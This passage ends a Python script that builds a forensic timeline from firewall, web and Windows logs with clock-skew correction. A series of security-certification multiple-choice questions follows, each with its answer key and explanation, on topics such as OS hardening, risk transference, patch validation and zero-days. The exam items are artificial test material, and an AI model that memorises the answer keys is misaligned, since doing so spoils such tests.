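    """'03/05/2024 09:03:35 AM ...' in local time -> UTC, minus the known skew."""
    local = datetime.strptime(line[:22], "%m/%d/%Y %I:%M:%S %p").replace(tzinfo=SOURCE_TZ["windows"])
    ts = local.astimezone(UTC)
    return ts - CLOCK_SKEW["windows"] if correct_skew else ts


def build_timeline(correct_skew: bool = True) -> list:
    """Return [(iso_utc, source, message), ...] sorted by true time."""
    events = []
    events += [(parse_firewall(l), "firewall", l) for l in FIREWALL_LOG]
    events += [(parse_web(l), "web", l) for l in WEB_LOG]
    events += [(parse_windows(l, correct_skew), "windows", l) for l in WINDOWS_LOG]
    events.sort(key=lambda e: e[0])
    return [(ts.isoformat(), source, msg) for ts, source, msg in events]


if __name__ == "__main__":
    print("naive (no skew correction):")
    for ts, source, msg in build_timeline(correct_skew=False):
        print(f"  {ts}  {source:8}  {msg[:60]}")
    print("corrected:")
    for ts, source, msg in build_timeline():
        print(f"  {ts}  {source:8}  {msg[:60]}")
```

Without the skew correction the RDP logon appears after the data export, which would suggest the export came from somewhere else; with the workstation clock corrected the logon sits between the firewall accept and the export, which is the order the attack actually took. Establishing each host's offset from a reference clock (NTP drift, or a known event that appears in two logs) is therefore part of building the timeline, not an afterthought.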

What is the benefit of hardening the operating system in the context of system and network architecture? A. To increase the number of software applications that can be run on the system B. To reduce the speed of system performance due to the extra security measures C. To improve the aesthetics of the graphical user interface (GUI) D. To decrease the risk of unauthorized access to sensitive data

D. To decrease the risk of unauthorized access to sensitive data Hardening the operating system means configuring it to minimize its attack surface: removing or disabling unnecessary services and accounts, applying patches, enforcing least-privilege access controls, enabling the host firewall and host-based intrusion detection, and restricting what can run on the system. Together these measures significantly reduce the risk of unauthorized access to sensitive data.

Which of the following is the most important reason to implement system hardening measures in a networked environment? A. To prevent denial-of-service attacks B. To secure data in transit between systems C. To ensure system performance remains optimal D. To reduce the risk of data breaches

D. To reduce the risk of data breaches System hardening measures like removing unnecessary software and services, disabling default accounts, and applying patches and updates help reduce the attack surface of a system and directly reduce the risk of data breaches.

A large pest control company's web application allows users to schedule appointments with their technicians every month. The application runs on outdated software and represents a security risk, but the software is also critical for business operations. Therefore, the company decides to outsource the software's functionality to a contractor who can contractually guarantee a certain level of operational safety through insurance. What kind of risk response does this represent? A. Avoidance B. Mitigation C. Acceptance D. Transference

D. Transference Risk transference (or sharing) means assigning risk to a third party, which most typically occurs through insurance policies.

A script kiddie is most likely to conduct which of the following operations? A. Setting up a watering hole to steal the login credentials for online bank accounts B. Monitoring the email communications of two European Prime Ministers C. Defacing the website of a prominent global oil company D. Using multiple unsophisticated scanning tools against a public-facing website

D. Using multiple unsophisticated scanning tools against a public-facing website Script kiddie refers to an unsophisticated actor who uses readily available hacker tools. Often a script kiddie has a limited understanding of the tools they are using.

A health software vendor issues a security patch to fix a known vulnerability in their system. What is the best way to ensure the hospital security administrator correctly applies the patch on the hospital's systems and addresses the original vulnerability? A. Testing B. Implementation C. Rollback D. Validation

D. Validation Patch validation verifies that the security administrator has correctly applied the patches or configuration changes to a system and has addressed the intended security vulnerability or issue.

Which of the following is a significant difference between containerization and virtualization in the context of security operations? A. Containerization provides a higher level of isolation between the container and the host operating system compared to virtualization. B. Virtualization provides faster resource allocation than containerization. C. Containerization enables multiple operating systems to run on a single physical machine, while virtualization does not. D. Virtualization enables multiple operating systems to run on a single physical machine, while containerization does not.

D. Virtualization enables multiple operating systems to run on a single physical machine, while containerization does not. The primary difference is that virtualization runs multiple virtual machines, each with its own operating system, on a single physical machine, while containerization runs multiple containers on a single shared operating system kernel. That shared kernel is why option A is wrong: containers are isolated by kernel namespaces and control groups rather than by a hypervisor, so a kernel vulnerability or container escape exposes every container on the host, whereas a virtual machine boundary is stronger.

What are the types of mitigations that would NOT be recommended in a detailed vulnerability report? A. Identify a patch B. Identify a permanent workaround C. Identify a temporary workaround until a patch is available D. Wait to see if a patch may be introduced sometime in the future

D. Wait to see if a patch may be introduced sometime in the future Waiting on a patch, thereby neglecting a vulnerability, can lead to serious consequences such as data breaches, loss of sensitive information, and damage to reputation.

An unauthorized hacker has discovered a publicly known vulnerability in a retail store's cloud-based supply chain management software. The exposure has a CVSS score of 9.3 and a high impact to confidentiality. Fortunately, there is no appropriate proof of concept or publicly available exploit for this vulnerability. What is the biggest hurdle to the hacker gaining access to the retail store's supply chain management software? A. Exploitability B. Attack complexity C. Attack vectors D. Weaponization

D. Weaponization No exploit or proof of concept is currently available for the identified vulnerability, so the attacker must first weaponize it by developing a working exploit. That development effort, not the attack vector or complexity recorded in the CVSS score, is the biggest hurdle to gaining access.

Which of the following provides the most correct description of zero-days in vulnerability management reporting and communication? A. Zero-days are vulnerabilities that should only be tracked if actively exploited. B. Zero-days are low-priority vulnerabilities that can be ignored until a patch is available. C. Zero-days are moderately serious vulnerabilities that are mitigated by configuration management procedures. D. Zero-days are vulnerabilities that require immediate attention and are tracked in a dashboard.

D. Zero-days are vulnerabilities that require immediate attention and are tracked in a dashboard. Zero-days are vulnerabilities for which no vendor patch yet exists, because the vendor has had zero days to respond since the flaw became known, whether the flaw is public or only known to attackers. Attackers can exploit these vulnerabilities to gain unauthorized access to systems and data. Analysts treat zero-days as high-priority vulnerabilities that require immediate attention, such as compensating controls until a patch ships, and track them in a dashboard so their status stays visible.
